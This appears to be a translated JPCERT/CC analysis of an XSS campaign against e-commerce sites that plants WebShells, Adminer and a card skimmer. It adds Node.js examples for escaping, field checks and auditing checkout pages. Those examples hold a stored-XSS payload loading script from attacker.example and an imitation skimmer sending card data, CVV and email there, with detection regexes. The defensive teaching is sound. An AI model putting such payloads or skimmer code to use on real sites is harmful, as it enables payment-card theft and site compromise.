Attack Exploiting XSS Vulnerability in E-commerce Websites
On 28 April 2021, Trend Micro reported the details of attacks exploiting cross-site scripting (hereafter "XSS") vulnerabilities on e-commerce websites. JPCERT/CC has also confirmed similar cases, which originate in XSS vulnerabilities in websites built with EC-CUBE products (an open source CMS for e-commerce websites). The attack does not depend on a vulnerability specific to EC-CUBE: any e-commerce website whose administrator page has an XSS vulnerability is affected. The campaign was still ongoing as of 1 July 2021. This article details the cases that JPCERT/CC has handled.
The flow of the attack is described in Figure 1.
Files embedded in e-commerce sites in the course of this attack are listed in Table 1.
| File | Description |
| --- | --- |
| WebShell | Multi-function WebShell (interface in Chinese; tool name unknown) |
| Database control tool | Adminer version 4.2.4 |
| Information-stealing script | Sends credit card information etc. when the user clicks; loaded on the login/transaction page |
| Information storage file | Stores credit card number, expiry date, security code, email address, password etc. |
| Simple WebShell | Executes an uploaded PHP file |
In the course of the attack, attackers embed Adminer on the e-commerce website. Adminer is a widely used tool for inspecting database contents through a web GUI and supports MySQL, PostgreSQL, SQLite, MS SQL, Oracle, SimpleDB, Elasticsearch and MongoDB. Because Adminer ships as a single PHP file, dropping it into the web root is enough to browse the shop's database with the credentials already configured for the site. Attackers are likely to have stolen database information using this tool.
Malicious purchase action exploiting XSS vulnerability
An XSS attack is performed as part of the purchase process using the malicious script below. Attackers submit the script in multiple form fields to increase the chance that one of them is rendered unescaped in the administrator page.
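The point of submitting the script through the purchase form is that it does nothing at checkout; it runs later, with the administrator's session, when the admin page renders the stored order. The following added example (not code from the article or from EC-CUBE) shows that mechanism in Node.js: a vulnerable admin-page template next to an escaped one, plus the server-side check a practitioner would log on. The order record, field names and script host are constructed placeholders.

```javascript
// Added example, not code from the JPCERT/CC article or from EC-CUBE.
// Stored XSS through a purchase form: the payload is inert at checkout and fires
// when an administrator opens the order and the server echoes the stored field
// into HTML without escaping. Order record, field names and host are constructed.

const SUBMITTED_ORDER = {
  id: 1001,
  // payload placed in the customer-name field; it closes an attribute and a tag first
  name: 'Taro Yamada"><script src="https://attacker.example/a.js"></script>',
  address: '1-2-3 Example-cho',
};

// Vulnerable admin template: stored values are concatenated straight into markup.
function renderOrderRowVulnerable(order) {
  return `<tr><td>${order.id}</td><td>${order.name}</td>` +
         `<td><input value="${order.address}"></td></tr>`;
}

// htmlspecialchars-style escaping, safe for text nodes and for quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened template: every stored value goes through escapeHtml().
function renderOrderRowSafe(order) {
  return `<tr><td>${escapeHtml(order.id)}</td><td>${escapeHtml(order.name)}</td>` +
         `<td><input value="${escapeHtml(order.address)}"></td></tr>`;
}

// True if the rendered HTML contains a live <script> element.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Server-side detection: names of submitted fields carrying markup or event handlers.
// A customer name or address never legitimately contains these, so a hit is worth
// logging, and the same payload in several fields at once is worth alerting on.
function findSuspiciousFields(order) {
  const re = /[<>]|\bon\w+\s*=|javascript:/i;
  return Object.keys(order).filter((k) => re.test(String(order[k])));
}

console.log('vulnerable:', renderOrderRowVulnerable(SUBMITTED_ORDER));
console.log('hardened:  ', renderOrderRowSafe(SUBMITTED_ORDER));
console.log('flagged fields:', findSuspiciousFields(SUBMITTED_ORDER));
```

In a Twig-based stack such as EC-CUBE 4 the equivalent defect is a template that disables autoescaping (for example with the `raw` filter) or a plugin that assembles HTML in PHP, which is why the article's advice extends to plugins.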
Stealing credit card information
Figure 4 describes the flow of attack stealing credit card information of the site visitor.
Attackers are assumed to have retrieved the credit card information stored in the "information storage file" via the WebShell.
The script checks the URL and hooks the user's mouse clicks to collect the values entered in each form component. In the script samples collected, the path of the e-commerce company's credit card transaction service is hard-coded, which indicates that the attackers customise the code for each target site.
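Those traits (a hard-coded path check, a click hook, reads of payment fields, and a send to another host) are what an auditor can look for in the checkout page as served to a browser. The following is an added example in Node.js, not the script recovered by JPCERT/CC: a heuristic audit of a checkout page's script tags. The sample page, its field names, the first-party host list and the attacker host are constructed, and the inline script in the sample only imitates the behaviour described above.

```javascript
// Added example, not the script recovered by JPCERT/CC. Audits checkout-page HTML
// for third-party script sources and for inline scripts that combine a URL check,
// a click hook, payment-field reads and exfiltration. Everything below is constructed.

const CHECKOUT_HTML = `<!doctype html>
<html><body>
<form id="payment" action="/shopping/payment">
  <input name="card_no"><input name="card_exp"><input name="card_cvv">
  <input name="email"><button type="submit">Pay</button>
</form>
<script src="/assets/js/shop.js"></script>
<script src="https://cdn.shop.example/checkout.js"></script>
<script>
// imitation of the described behaviour: hard-coded path, click hook, harvest, send
if (location.pathname.indexOf('/shopping/payment') === 0) {
  document.addEventListener('click', function () {
    var d = {};
    ['card_no', 'card_exp', 'card_cvv', 'email'].forEach(function (n) {
      var e = document.getElementsByName(n)[0];
      if (e) d[n] = e.value;
    });
    new Image().src = 'https://attacker.example/i.php?q=' + btoa(JSON.stringify(d));
  });
}
</script>
</body></html>`;

// Hosts the shop is expected to load scripts from (constructed allowlist).
const FIRST_PARTY_HOSTS = ['shop.example', 'cdn.shop.example'];

const URL_CHECK_RE = /location\.(?:pathname|href)/;
const CLICK_HOOK_RE = /addEventListener\s*\(\s*['"](?:click|mousedown|mouseup|submit)['"]|\.onclick\s*=/;
const CARD_FIELD_RE = /card_?no|card_?number|card_?exp|expir|cvv|cvc|security_?code/i;
const EXFIL_RE = /new Image\(\)|XMLHttpRequest|\bfetch\s*\(|sendBeacon|\.src\s*=\s*['"]https?:/;

// Split a page into its <script> elements: {src, body}.
function findScripts(html) {
  const scripts = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = m[1].match(/\bsrc\s*=\s*["']([^"']+)["']/i);
    scripts.push({ src: src ? src[1] : null, body: m[2] });
  }
  return scripts;
}

// Hosts named in absolute URLs inside a script body.
function hostsIn(body) {
  return Array.from(body.matchAll(/https?:\/\/([^/'"\s]+)/g), (m) => m[1]);
}

function auditCheckoutPage(html, firstPartyHosts) {
  const findings = [];
  findScripts(html).forEach((s, index) => {
    if (s.src !== null) {
      // external script: flag any host that is not on the allowlist
      const m = s.src.match(/^(?:https?:)?\/\/([^/]+)/);
      if (m && !firstPartyHosts.includes(m[1])) {
        findings.push({ index, reason: 'external script from unlisted host', hosts: [m[1]] });
      }
      return;
    }
    const traits = {
      urlCheck: URL_CHECK_RE.test(s.body),
      clickHook: CLICK_HOOK_RE.test(s.body),
      cardFields: CARD_FIELD_RE.test(s.body),
      exfil: EXFIL_RE.test(s.body),
    };
    if (traits.clickHook && traits.cardFields && traits.exfil) {
      findings.push({
        index, reason: 'inline skimmer-like script', traits,
        hosts: hostsIn(s.body).filter((h) => !firstPartyHosts.includes(h)),
      });
    }
  });
  return findings;
}

console.log(JSON.stringify(auditCheckoutPage(CHECKOUT_HTML, FIRST_PARTY_HOSTS), null, 2));
```

The check is a heuristic: obfuscated or minified payloads need to be decoded before the patterns match, and, because the script is only loaded on the login/transaction page, the audit has to run against the HTML of those pages as served to a real session, not against the templates on disk.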
WebShell that was likely used to steal information
The control page of the WebShell is shown in Figure 8. It provides functions such as file download/upload and shell command execution, and its interface is in Chinese.
We have described an attack that steals credentials through the administrator's page. Even if the e-commerce site itself has no security issue, the attack can be carried out through a vulnerable plugin, so plugins should be kept updated as well. Please refer to JPCERT/CC's security alerts and advisory regarding the vulnerabilities exploited.
For reference, the IP addresses, domain names and file hash values identified in the attack are listed in Appendix A and Appendix B.
- Yuma Masubuchi, Shusei Tomonaga
(Translated by Yukako Uchida)
Appendix A: Attackers’ IP address and domains
Appendix B: SHA256 hash values of files used in the attack
Note: These hash values include tools which may also be used in daily operations. Beware of false positives when using them as indicators of compromise.